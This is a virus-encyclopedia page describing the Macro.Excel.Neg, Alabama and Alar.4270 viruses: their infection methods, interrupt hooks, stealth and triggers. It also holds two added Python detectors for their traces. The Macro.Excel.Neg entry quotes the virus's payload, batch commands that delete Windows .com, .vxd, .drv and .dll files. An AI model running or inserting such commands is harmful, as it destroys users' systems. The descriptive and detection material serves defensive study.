Virus Database


Macro.Excel.Neg

Description Macro.Excel.Neg

This virus infects Excel sheets. It contains six functions in a single module, Dollar: Auto_Open, Fuck, Auto_Close, cek_global, infectglobal, and inFuckIt.
When an infected document is loaded, Excel executes the auto macro auto_open, and the virus takes control. The virus's auto_open macro contains a command that defines the F*ck macro as the handler of the OnSheetActivate routine. As a result, the virus hooks the sheet activate routine, and whenever a sheet is opened, the virus takes control.
When the auto_open macro takes control, it searches for the DOLLAR.XLM file in the Excel Startup directory. If the infected macro is in the active Workbook and the DOLLAR.XLM file does not exist in the Excel Startup directory when the virus is executed for the first time, the virus creates this file and saves its code to it by using the SaveAs command. The next time Excel loads its modules, it automatically loads all XLS files from the Startup directory. The infected DOLLAR.XLM is loaded along with the other files, and the virus takes control and hooks the sheet activation routine. Upon activation of a sheet, the virus copies its code to the active Workbook and, as a result, spreads its code to this sheet.
The virus deletes 25 menu items related to macro viewing, editing, etc., if they exist. On the 13th of any month, it appends to the C:\AUTOEXEC.BAT file commands that erase Windows files:
@ECHO OFF
CLS
cd\windows
del *.com >nul
del *.vxd >nul
del *.drv >nul
del *.dll >nul
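
A defender checking a machine for the two traces described above (the DOLLAR.XLM file in the Excel Startup directory and the delete commands appended to AUTOEXEC.BAT) could use a check like this one. It is an added example, not code from the original page; the function names and the sample file contents are constructed for illustration.

```python
import re

SYSTEM_EXTS = {"com", "vxd", "drv", "dll"}   # extensions named in the description
CD_RE = re.compile(r"^(?:cd|chdir)\s*(\S+)$", re.I)
DEL_RE = re.compile(r"^(?:del|erase)\s+\*\.(\w+)", re.I)

def find_destructive_deletes(batch_text):
    """Return (line_no, line) for wildcard deletes of system file types
    issued after the script has changed into a Windows directory."""
    hits, in_windows = [], False
    for no, raw in enumerate(batch_text.splitlines(), 1):
        line = raw.strip().lstrip("@")
        m = CD_RE.match(line)
        if m:
            # Track the directory the following commands will run in.
            target = m.group(1).strip("\\").lower()
            in_windows = target.split("\\")[-1] == "windows"
            continue
        m = DEL_RE.match(line)
        if m and in_windows and m.group(1).lower() in SYSTEM_EXTS:
            hits.append((no, raw.strip()))
    return hits

def startup_dropper_present(startup_listing, name="DOLLAR.XLM"):
    """True if the template file named in the description is in the listing
    of the Excel Startup directory (comparison is case-insensitive)."""
    return any(entry.upper() == name for entry in startup_listing)

# Constructed sample: an ordinary AUTOEXEC.BAT followed by the appended lines.
SAMPLE_AUTOEXEC = "\n".join([
    r"PATH C:\DOS;C:\WINDOWS",
    r"del c:\temp\*.tmp >nul",
    "@ECHO OFF",
    "CLS",
    r"cd\windows",
    "del *.com >nul",
    "del *.vxd >nul",
    "del *.drv >nul",
    "del *.dll >nul",
])

if __name__ == "__main__":
    for no, line in find_destructive_deletes(SAMPLE_AUTOEXEC):
        print(f"AUTOEXEC.BAT line {no}: {line}")
    print(startup_dropper_present(["BOOK1.XLS", "dollar.xlm"]))
```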

The virus contains the comments:
------------------------------------------------
Generated with NEG !!. Please include this text
------------------------------------------------
NEG is Trademark of NoMercy
Date generated : 27- 3- 1998
VirusName: Dollar
Author: NEG
Module Name: Dollar
Template: DOLLAR.XLM


Alabama

Description Alabama

It is a very dangerous resident virus. It infects .EXE files in the current directory of the disk from which a file is being run or on which a file is being opened. The file to infect is located with the FindFirst and FindNext functions and does not necessarily coincide with the file being opened or executed. When infecting, "Alabama" uses FCB functions to work with files and appends itself to the end of the file; incorrect infection is possible. In an infected file the time of last modification is set to 62 seconds.
This infector tries to "survive" a reboot. For this purpose it hooks INT 9h (keyboard), intercepts the Alt-Ctrl-Del combination, then turns off the screen and calls the boot procedure (INT 19h). During this operation the virus code is not erased.
Depending on the current time, "Alabama" may display the message:
+-----------------------------------------------------+
¦ SOFTWARE COPIES ARE PROHIBITED BY INTERNATIONAL LAW ¦
¦ ¦
¦ Box 1055 Tuscambia ALABAMA ¦
+-----------------------------------------------------+

The virus hooks INT 9h and 21h, contains the text string "????????EXE" and doesn't have destructive functions. However, it handles files and memory incorrectly and may hang the system.
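
The 62-second modification time mentioned above is checkable because DOS stores seconds in 2-second units in a 5-bit field, so 62 is a value no normal clock produces. The following added example (not part of the original description) parses FAT directory entries and lists .EXE files carrying that value; the function names and the sample directory are constructed, and a hit is only a reason to inspect the file, not proof of infection.

```python
import struct

# FAT directory entry (32 bytes, little-endian): name[8] ext[3] attr[1]
# reserved[10] time[2] date[2] start_cluster[2] size[4].
ENTRY = struct.Struct("<8s3sB10sHHHI")
MARKER_SECONDS = 62  # value the description gives for infected files

def decode_dos_time(word):
    """Unpack a DOS time word into (hours, minutes, seconds)."""
    hours = (word >> 11) & 0x1F
    minutes = (word >> 5) & 0x3F
    seconds = (word & 0x1F) * 2          # stored as seconds/2, so 31 -> 62
    return hours, minutes, seconds

def suspicious_exe_entries(directory_bytes):
    """Return names of .EXE entries whose seconds field equals 62."""
    hits = []
    for off in range(0, len(directory_bytes) - ENTRY.size + 1, ENTRY.size):
        name, ext, attr, _, time_w, _, _, _ = ENTRY.unpack_from(directory_bytes, off)
        if name[0] == 0x00:              # end-of-directory marker
            break
        if name[0] == 0xE5 or attr & 0x18:   # deleted, volume label, subdirectory
            continue
        if ext.strip().upper() != b"EXE":
            continue
        if decode_dos_time(time_w)[2] == MARKER_SECONDS:
            hits.append(name.decode("ascii", "replace").strip() + ".EXE")
    return hits

def make_entry(name, ext, h, m, s, size=4096):
    """Build a constructed directory entry for the sample below."""
    time_w = (h << 11) | (m << 5) | (s // 2)
    return ENTRY.pack(name.ljust(8).encode(), ext.ljust(3).encode(),
                      0x20, b"\0" * 10, time_w, 0x2A21, 2, size)

# Constructed sample directory: a normal .EXE, an .EXE with the 62-second
# value, and a .COM with the same value (skipped: the description names .EXE).
SAMPLE_DIR = (make_entry("EDIT", "EXE", 12, 30, 14)
              + make_entry("GAME", "EXE", 9, 5, 62)
              + make_entry("TOOL", "COM", 9, 5, 62)
              + bytes(32))

if __name__ == "__main__":
    print(suspicious_exe_entries(SAMPLE_DIR))
```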

Alar.4270

Description Alar.4270

This is a very dangerous memory-resident, multipartite, polymorphic, stealth virus. It writes itself to the end of COM and EXE files and to the MBR of the hard drive. When an infected file is executed, the virus infects the MBR of the hard drive. Then it hooks interrupt vectors (as it also does when loading from an infected MBR) and stays memory resident. Because of an error, the virus corrupts hard drives that have fewer than 18 sectors per track while infecting them. The virus infects files that are executed or closed and disinfects infected files that are opened.
The virus hooks INT 21h for file infection and stealth, INT 13h for disk stealth and to hook INT 21h while loading from an infected disk, INT 17h to change some data that are printed, and INT 1Ch for a video effect (the virus "shakes" the screen). While infecting the MBR, the virus temporarily hooks INT 10h and 16h (video and keyboard) to fool internal BIOS anti-virus protection.
The virus intercepts command-line commands, and when the "stop creeping" text is entered, the virus disables its infection and stealth routines. When the "tell me your version" text is entered, the virus displays:
Alar Abaddon virus. Version 1.2 (peaceful)
Created by Gall.. A..... (C) 05/29/97
When the "do it right now" text is entered, the virus erases the CMOS.
The virus checks the CRC of its INT 21h handler's code, and if this code is modified (the TSR part of the virus is disinfected), the virus displays a message in Russian and halts the computer.
When executed under minor DOS versions, the virus displays the following message and returns to DOS:
Invalid parameter missing

    Copyright © 2005 Virus-Database.com